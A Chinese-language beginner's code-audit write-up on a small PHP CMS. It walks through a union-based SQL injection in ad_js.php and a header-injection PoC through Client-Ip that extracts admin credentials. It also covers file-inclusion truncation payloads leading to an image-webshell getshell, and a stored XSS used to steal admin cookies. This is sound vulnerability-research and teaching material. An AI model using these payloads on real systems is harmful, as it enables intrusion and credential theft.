初入代码审计，先用最朴素方法，从最简单的cms开始审计吧。

掏出seay一顿撸。

 

一 ad_js.php存在sql注入

参数没有加单引号保护，即使包含了require_once dirname(__FILE__) . '/include/common.inc.php'; 网站配置文件，对传入的参数

进行了统一gpc转义处理

get_magic_quotes_gpc函数作用

if(!get_magic_quotes_gpc())//如果php配置中没有开启gpc转义配置，则在此进行转义
{
    $_POST = deep_addslashes($_POST);
    $_GET = deep_addslashes($_GET);
    $_COOKIES = deep_addslashes($_COOKIES);
    $_REQUEST = deep_addslashes($_REQUEST);
}

但是此处没有加单引号过滤。

继续跟踪到getone函数

    function getone($sql, $type=MYSQL_ASSOC){
        $query = $this->query($sql,$this->linkid);
        $row = mysql_fetch_array($query, $type);
        return $row;
    }

只是简单的查询语句，没有加过滤。

?ad_id=1 union select 1,2,3,4,5,6,7 #

ctrl+u可以看到显示位。

 

二 commenr.php头部sql注入漏洞

function getip()
{
    if (getenv('HTTP_CLIENT_IP'))
    {
        $ip = getenv('HTTP_CLIENT_IP'); 
    }
    elseif (getenv('HTTP_X_FORWARDED_FOR')) 
    { 
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    }
    elseif (getenv('HTTP_X_FORWARDED')) 
    { 
        $ip = getenv('HTTP_X_FORWARDED');
    }
    elseif (getenv('HTTP_FORWARDED_FOR'))
    {
        $ip = getenv('HTTP_FORWARDED_FOR'); 
    }
    elseif (getenv('HTTP_FORWARDED'))
    {
        $ip = getenv('HTTP_FORWARDED');
    }
    else
    { 
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

http头部可以伪造

配置文件中对$*post、$*get、$*cookies和$*request统一进行gpc处理，但是遗漏了$_SERVER。而且网站恰恰通过该变量获取ip地址，因此我们就可以对ip通过client-ip或x-forwarded-for等进行伪造。

查看哪些地方用了这个危险函数。

comment.php 文件中有

$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) 
             VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";

发布新闻之后评论一下抓包。

 

 

 截断调试。

添加请求头 Client-Ip: test

 

 

 确实是没有过滤的被插入到sql语句中。

构造poc

1.1.1.1','1'), ('', '1', '1', '1', '6', (select group_concat(admin_name,":",pwd) from blue_admin), '1613538242', '1.1.1.1

 

 

 三 文件包含漏洞

user.php存在此漏洞

全文追踪

 

 

还有addslashes_deep的过滤，但是这是无法防住文件包含的。

00截断（需要 php版本小于 5.3.8 以及 magic_quotes_gpc = Off ）

点号截断（只适用于windows）（php版本 5.2.17、 magic_quotes_gpc = On ）
index.php?file=phpinfo.php...........................................................................................................................................................................................................................（本次测试长度需要大于269）

./截断 （php版本 5.2.17、 magic_quotes_gpc = On ）
index.php?file=phpinfo.php././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. /././././（本次测试长度需要大于269）

配合文件上传包含图片马getshell。

四 存储xss

用户注册时候邮箱，构造xss

 

 后台可以弹出xss盗取cookie